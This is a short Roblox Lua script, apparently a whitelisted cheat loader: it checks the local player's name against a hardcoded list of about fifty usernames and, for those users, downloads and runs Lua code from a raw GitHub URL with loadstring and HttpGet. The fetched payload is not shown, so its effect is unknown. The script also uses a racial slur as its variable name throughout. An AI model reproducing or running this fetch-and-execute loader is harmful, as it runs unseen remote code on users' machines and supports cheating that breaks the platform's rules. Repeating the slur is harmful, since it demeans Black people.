local nigga = game.Players.LocalPlayer.Name
if nigga == "derrick0119" or
   nigga == "jaydaistoreal" or
   nigga == "maxy9987" or
   nigga == "I8XR" or
   nigga == "alexg2108" or
   nigga == "lilhackia" or
   nigga == "11tide11" or
   nigga == "Nicolaim12345" or
   nigga == "vhill_ej" or
   nigga == "MASTERGAMER10236" or
   nigga == "Mikey_bandooo" or
   nigga == "icantcompriehaned" or
   nigga == "YPK_JJx" or
   nigga == "YouarejustDeadLol" or
   nigga == "Blackbeardsbelly" or
   nigga == "hello4444nl" or
   nigga == "xlilmantis" or
   nigga == "11Tide11" or
   nigga == "antikupper" or
   nigga == "its_jaystar51robux" or
   nigga == "notwkeisthename" or
   nigga == "king_beastmode15" or
   nigga == "x_csrf" or
   nigga == "Theywannabetay" or
   nigga == "SYKO_HATESALL" or
   nigga == "Najagaming8alt" or
   nigga == "Turbomckwk" or
   nigga == "Kaimon124567" or
   nigga == "Ishenur" or
   nigga == "kaix_rnt" or
   nigga == "ricric62" or
   nigga == "J0hnson8" or
   nigga == "Jonathanloves_cars" or
   nigga == "lm_soIonely" or
   nigga == "0x3919" or
   nigga == "Swiftlyugly" or
   nigga == "AmirR0917" or
   nigga == "Boyy11514" or
   nigga == "Realkanel" or
   nigga == "UnterAyri696" or
   nigga == "Cursedvamp1re" or
   nigga == "HeadTapCentraI" or
   nigga == "Raxitkaku" or
   nigga == "chad2746" or
   nigga == "homixidexchoppa" or
   nigga == "Spookydaman556" or
   nigga == "chris_1234343" or
   nigga == "ApexJustin10" or
   nigga == "Roccomassala2" or
   nigga == "soleezZ" or
   nigga == "Angelonperks" or
   nigga == "vxReno_11" or
   nigga == "Ecylae" then
    loadstring(game:HttpGet("https://raw.githubusercontent.com/rijadha22/bruh/main/nun"))()
end
